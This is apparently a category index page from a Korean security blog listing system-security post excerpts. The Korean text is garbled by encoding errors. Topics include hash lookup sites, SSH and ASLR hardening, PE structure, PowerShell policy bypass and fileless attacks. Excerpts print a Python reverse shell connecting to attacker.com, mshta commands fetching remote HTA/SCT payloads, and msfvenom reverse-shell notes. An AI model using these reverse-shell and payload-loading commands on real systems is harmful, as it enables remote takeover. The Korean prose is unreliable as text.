728x90 ๐์ ๋ณด๋ณด์/์์คํ ๋ณด์18 ์์คํ ๋ณด์ - ํด์(MD5, SHA1, SHA256) ํ์ธ ์ฌ์ดํธ ๋ชจ์ ํด์ ์๋ณ https://hashes.com/en/tools/hash_identifier Hash Type Identifier - Identify unknown hashesIdentify and detect unknown hashes using this tool. This page will tell you what type of hash a given string is. If you want to attempt to Decrypt them, click this link instead. Decrypt Hasheshashes.com ํด์ ๋ณตํธํ https://hashes.com/en/decrypt/hash Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256.. 2025. 7. 18. ์์คํ ๋ณด์ - Powershell ์คํ ์ ์ฑ ์ฐํํ๋ 15๊ฐ์ง ๋ฐฉ๋ฒ https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/ 15 Ways to Bypass the PowerShell Execution PolicyBy default, PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. In this blog I’ll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on .. 2024. 4. 24. ์์คํ ๋ณด์ - SSH root ์๊ฒฉ ์ ์ ์ฐจ๋จ ์ ์ฑ ์ค์ (/etc/ssh/sshd_config) SSH root ์๊ฒฉ ์ ์ ์ฐจ๋จ ์ ์ฑ ์ค์ (/etc/ssh/sshd_config) ๊ธฐ์กด "PermitRootLogin yes"๋ฅผ "PermitRootLogin no"๋ก ์์ ํ๋ค. # vim /etc/ssh/sshd_config # Authentication PermitRootLogin no ์ค์ ์ด ์๋ฃํ์๋ค๋ฉด ์๋น์ค๋ฅผ ์ฌ์์ํ๋ค. service ssh restart ์ ์ฑ ์ ์ค์ ํ๊ธฐ ์ด์ (PermitRootLogin yes) root@kali:~/Desktop# ssh root@localhost root@localhost's password: Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 The programs inc.. 2023. 11. 10. ์์คํ ๋ณด์ - ๋ฆฌ๋ ์ค ์ปค๋ ASLR ๋ฉ๋ชจ๋ฆฌ ๋ณดํธ ๊ธฐ๋ฒ ์ค์ (randomize_va_space) ASLR(Address Space Layout Randomization)์ด๋? ๋ฉ๋ชจ๋ฆฌ ๊ณต๊ฒฉ์ ๋ฐฉ์ดํ๊ธฐ ์ํด ์ฃผ์ ๊ณต๊ฐ ๋ฐฐ์น๋ฅผ ๋์ ํํ๋ ๊ธฐ๋ฒ์ผ๋ก ์คํ ์๋ง๋ค ๋ฉ๋ชจ๋ฆฌ ์ฃผ์๋ฅผ ๋ณ๊ฒฝ์์ผ ์ ์ฑ์ฝ๋์ ์ํ ํน์ ์ฃผ์ ํธ์ถ์ ๋ฐฉ์งํ๋ค. ๋ฆฌ๋ ์ค ASLR ์ ์ฉ (/proc/sys/kernel/randomize_va_space ์์ ) echo 0 > /proc/sys/kernel/randomize_va_space # ASLR ๋ฏธ์ค์ echo 1 > /proc/sys/kernel/randomize_va_space # ASLR ๋ถ๋ถ์ค์ (heap๋ง ๋ฏธ์ค์ ) echo 2 > /proc/sys/kernel/randomize_va_space # ASLR ๋ชจ๋์ค์ (stack, heap, library ๋ฑ) sysctl ๋ช ๋ น์ด๋ก ๋ฆฌ๋ .. 2023. 11. 9. ์์คํ ๋ณด์ - EXE ํ์ผ PE(Portable Executable) ๊ตฌ์กฐ ๋ถ์ํ๊ธฐ PE(Portable Executable)์ด๋? Windows ์ด์์ฒด์ ์์ ์คํ๋๋ ์ด์ง ํ์ผ ํ์์ ์๋ฏธํ๋ค. ์ด ํ์ผ ํ์์ Windows ์ด์์ฒด์ ์์ ์คํ ๊ฐ๋ฅํ ํ๋ก๊ทธ๋จ, DLL, ๋๋ผ์ด๋ฒ ๋ฑ์ ํฌํจ๋๋ค. ๋ฆฌ๋ ์ค์๋ PE์ ๋น์ทํ ํ์ผ ํ์์ด ์์ผ๋ฉฐ ELF(Executable and Linkable Format)๋ผ๊ณ ๋ถ๋ฅธ๋ค. PE ํ์ผ ์ข ๋ฅ 1) ์คํ ๊ณ์ด : EXE, SCR 2) ๋ผ์ด๋ธ๋ฌ๋ฆฌ ๊ณ์ด : DLL, OCX, CPL, DRV 3) ๋๋ผ์ด๋ธ ๊ณ์ด : SYS, VXD 4) ์ค๋ธ์ ํธ ํ์ผ ๊ณ์ด : OBJ ์ฌ์ฉ ๋ชฉ์ ํ๋ก๊ทธ๋จ์ ์ฌ์ฉํ๊ธฐ ์ํด์๋ ๋ฉ๋ชจ๋ฆฌ ๊ณต๊ฐ์ ์ ์ฌ๊ฐ ๋์ด์ผ ํ๋ค. ์ด๋ PE์๋ ๋ฉ๋ชจ๋ฆฌ ๊ณต๊ฐ์ ์ด๋ ์ฃผ์์ ์ ์ฌ๊ฐ ๋ ์ง์ ์คํ์ ํ์ํ ๋ผ์ด๋ธ๋ฌ๋ฆฌ ๊ฐ์ ์ ๋ณด๋ค์ด ํฌํจ๋์ด ์๋ค. PE .. 2023. 10. 7. ์์คํ ๋ณด์ - pwntools pwntools๋ ๋ฆฌ๋ ์ค ํ๊ฒฝ์์ ์คํ ํ๋ก๊ทธ๋จ์ ์ต์คํ๋ก์์ ์์ฑํ๋๋ก ๋์์ ์ฃผ๋ ํ์ด์ฌ ๋ผ์ด๋ธ๋ฌ๋ฆฌ์ด๋ค. CTF์์๋ ์ ์ฉํ๊ฒ ์ฌ์ฉ๋ ์ ์๋ค. pip ์ค์น ๋ช ๋ น์ด python3 -m pip install --upgrade pwntools ์ฌ์ฉ ์์ >>> conn = remote('ftp.ubuntu.com',21) >>> conn.recvline() # doctest: +ELLIPSIS b'220 ...' >>> conn.send(b'USER anonymous\r\n') >>> conn.recvuntil(b' ', drop=True) b'331' >>> conn.recvline() b'Please specify the password.\r\n' >>> conn.close() nc(NetCat), .. 2023. 3. 25. ์์คํ ๋ณด์ - ์๋์ฐ MSHTA(Microsoft HTML Application) ๊ณต๊ฒฉ command-line mshta.exe vbscript:Close(Execute("GetObject(""script:http://127.0.0.1:4444/payload.sct"")")) mshta.exe http://127.0.0.1:4444/payload.hta mshta.exe \\127.0.0.1\folder\payload.hta payload.hta (SCT payloads) ๊ฒฐ๊ณผ HTA(HTML Application) ๋ณด๋ ๊ฒ์ฒ๋ผ ์๋์ฐ์ ๊ธฐ๋ณธ์ ์ผ๋ก ์ค์น๋ mshta.exe(Microsoft HTML Application)๋ ๋ง์น ์น ๋ธ๋ผ์ฐ์ ์ฒ๋ผ ์ธ๋ถ์ ์๋ ์น ํ์ด์ง๋ฅผ ์์ฒญํ๋ ๊ธฐ๋ฅ์ ๊ฐ์ง๊ณ ์๋ค. ์ฌ๊ธฐ์ ๋ฌธ์ ์ ์ ์ฌ๊ธฐ์ ๋ด์ฅ๋ ๋ธ๋ผ์ฐ์ ๊ฐ ์ธํฐ๋ท ์ต์คํ๋ก๋ฌ ๊ธฐ๋ฐ์ธ์ง ActiveXObject.. 2023. 2. 7. ์์คํ ๋ณด์ - ์คํ ํ์ผ์ด ์๋ ์ฐํ ๊ธฐ๋ฒ(ํ์ผ๋ฆฌ์ค ๊ณต๊ฒฉ) "ํ์ผ๋ฆฌ์ค"๋ผ๋ ์ฉ์ด๋ ์ปดํจํฐ์ ๋ฉ๋ชจ๋ฆฌ์๋ง ์๋ ๋ฐฑ๋์ด์ ๊ฐ์ ์ํ์ด ํ์ผ์ ์ ๊ณต๋์ง ์์์ ์์ฌํฉ๋๋ค. ํ์ผ๋ฆฌ์ค ๊ธฐ๋ฒ์ ๊ณต๊ฒฉ์ด ํ์ง๋์ง ์๊ฑฐ๋ ์ถ์ ์ด ํ๋ค๋ค. ๊ธฐ๋ณธ์ ์ผ๋ก ์ ์ฑ์ฝ๋๊ฐ ๋์คํฌ์ ํ์ผ ํํ๋ก ์กด์ฌํ์ง ์์ ์ค์บ ๋์์ด ๋์ง๊ฐ ์๋๋ค. 2016๋ ๋๋ถํฐ ํ์์์ด ํ์ฉ์ด ๋ ํ์ผ๋ฆฌ์ค ๊ณต๊ฒฉ์ด ์ฆ๊ฐ์ธ๋ฅผ ๋ณด์๋ค. ์์ 1) LNK ํ์ผ์ ์ด์ฉํ ํ์์ ธ ์ ๋ผ์ด๋ ์คํ ํ๋ฉด์ clickme๋ผ๋ ์ด๋ฆ์ ๋ฌธ์ ํ์ผ์ฒ๋ผ ๋ณด์ด๋ ํ์ผ์ ์ฌ์ค LNK ํ์ผ์ด๋ค. ํ์ผ์ ์์ฑ์ ์ดํด๋ณด๋ฉด ํ์์ ธ์ด ์คํ๋๋๋ก ๋ฑ๋ก๋ผ ์๋ ๊ฒ์ ๋ณผ ์ ์๋๋ฐ, ์๋ํฐ๋ฅผ ์ด์ฉํด ํ์ผ์ ๋ด์ฉ์ ์์ธํ ์ดํด๋ณด๋ฉด, ํ์์ ธ ์ ๋ผ์ด๋๋ผ๋ ๊ฒ์ ์ ์ ์๋ค. [๊ทธ๋ฆผ 7] clickme ๋ฌธ์๋ก ๋ณด์ด๋ LNK ํ์ผ ์์ 2) ์์ ์ ์ด์ฉํ ํ์์ ธ ์ .. 2023. 2. 7. ์์คํ ๋ณด์ - ํ์ด์ฌ ๋ฆฌ๋ฒ์ค ์ ์คํฌ๋ฆฝํธ export RHOST=attacker.com export RPORT=12345 python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' ๋๋ถ๋ถ์ ์ ๋์ค ๊ณ์ด์ OS(๋ฆฌ๋ ์ค, ๋งฅos)์๋ python2๋ ์ค์น๊ฐ ๋์ด์๋ ๊ฒฝ์ฐ๊ฐ ๋ง์ผ๋ ๋ณ๋์ ์ค์น ์์ด ๋ช ๋ น์ด๋ง์ผ๋ก ์ฌ์ฉ ๊ฐ๋ฅํ๋ค. ์ถ์ฒ: https://gtfobins.github.io/gtfobins/python/#reverse-shell python | GTFOBins Run socat file:`tt.. 2023. 1. 25. ์์คํ ๋ณด์ - ๋ฉํ์คํ๋ก์ msfvenom ๋ฆฌ๋ฒ์ค ์ ์ ์ ๋ช ๋ น์ด ์ถ์ฒ: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter) Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn More There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes n… infinitelogins.com ์๋์ฐ msfvenom -p windows/meterp.. 2023. 1. 24. ์์คํ ๋ณด์ - EXE ํ์ฅ์๋ฅผ ๋์ฒดํ๋ ํ์ฅ์๋ค(SCR, COM, BAT) .exe ํํ์ ์คํ ํ๋ก๊ทธ๋จ ๋ง๊ณ ๋ .scr๊ณผ .com์ผ๋ก๋ ๋์ผํ ์คํ ๊ฒฐ๊ณผ๋ฅผ ๊ฐ์ ธ์ฌ ์ ์๋ค. .scr .scr์ ํ๋ฉด ๋ณดํธ๊ธฐ ์ฆ Windows Screensaver๋ฅผ ์๋ฏธํ์ง๋ง ๋ง์ฐฌ๊ฐ์ง๋ก ํฌ๋งท ์ข ๋ฅ๊ฐ ์คํ ํ์ผ ํํ๋ผ์ .exe ํ์ผ์ ํ์ฅ์๋ฅผ .scr๋ก ๋ฐ๊ฟ๋ง ์ค๋ ๋๊ฐ์ด ์คํ์ด ์ ๋๋ค. ์ด๋ฅผ ์ ์ฉํ์ฌ ๋ฐฑ์ ํ๋ก๊ทธ๋จ์ด .exe๋ฅผ ์ฐ์ ์ ์ผ๋ก ๊ฒ์ฌํ๋ค๋ ๊ฒ์ ์ฐํํ๊ธฐ ์ํด์ .scr์ ๋์ ์ฌ์ฉํ๋ ๋ฉ์จ์ด๋ ์กด์ฌํ๋ค. .com .com์ DOS Command File์ผ๋ก .scr๊ณผ ๋ง์ฐฌ๊ฐ์ง๋ก ์คํ ํ์ผ ํฌ๋งท์ ๊ฐ์ง๊ณ ์์ด์ .exe ํ์ผ์ .com์ผ๋ก ๋ฐ๊ฟ์ค๋ ๋์ผํ๊ฒ ์คํ๋๋ค. ์๋๋ DOS ํ๊ฒฝ์์ ์์ฃผ ์ฌ์ฉ๋๋ ํ์ฅ์์ด์๋ค๊ณ ํ๋ค. ์ฐ๋ฆฌ๊ฐ ์์ฃผ ์ฌ์ฉํ๋ ์ธํฐ๋ท ๋๋ฉ์ธ ".com"๊ณผ๋ ๋ค๋ฅธ ๊ฒ.. 2022. 10. 7. ์์คํ ๋ณด์ - Jscript Jscript๋ ECMA์คํฌ๋ฆฝํธ ํ์ค์ ๊ธฐ๋ฐ์ ๋ ์คํฌ๋ฆฝํ ์ธ์ด์ด๊ธฐ ๋๋ฌธ์ Javascript๊ณผ ๋ฌธ๋ฒ์ด ๋๊ฐ๋ค. ๊ฒ๋ค๊ฐ ๋ ๋ค ๋ธ๋ผ์ฐ์ ์์ ์คํ์ํค๋ ์คํฌ๋ฆฝํธ ์ธ์ด์ธ ๊ฒ๋ ๋์ผํ๋ค. (Jscript: ๋ง์ดํฌ๋ก์ํํธ ๊ฐ๋ฐ, Javascript: ๋ท์ค์ผ์ดํ ๊ฐ๋ฐ) ํ์ง๋ง ๋์ด ๊ฐ๋ค๊ณ ํ ์๋ ์๋ ๊ฒ Jscript๋ ์์คํ ๋ด์ ์ธ๋ถ ํ๋ก๊ทธ๋จ์ ์คํ์ํฌ ์ ์๋ WScript(์๋์ฐ ์คํฌ๋ฆฝํธ ํธ์คํธ)๋ฅผ ์ถ๊ฐํ ์ธ์ด๋ผ๋ ์ . ์์๋ก Jscript๋ ์ธํฐ๋ท ์ต์คํ๋ก๋ฌ์์ ์ฐ์ด๋๋ฐ(์ง๊ธ์ ์ฌ์ฉ ์ค๋จํ์ง๋ง) ์ฐ๋ฆฌ๊ฐ ์ํ ์ฌ์ดํธ์ ๋ค์ด๊ฐ๊ฒ ๋๋ฉด ์ปดํจํฐ์ ๊น๋ ค์๋ ๋ณด์ ํ๋ก๊ทธ๋จ๊ณผ ์ํธ์์ฉ์ ํ๊ฒ ๋๋๋ฐ ์ด๊ฒ WScript ๋๋ถ์ ๊ฐ๋ฅํ ์ผ์ด๋ค. ๊ฐ๋ ์๋์ฐ์์ .js ํ์ผ์ ํ์ธํ๋ฉด ์๋์ฒ๋ผ ๋ญ๊ฐ ์์ด์ฝ๋ ์๊ณ ํ๋ฐ .. 2022. 10. 6. ์ด์ 1 2 ๋ค์ 728x90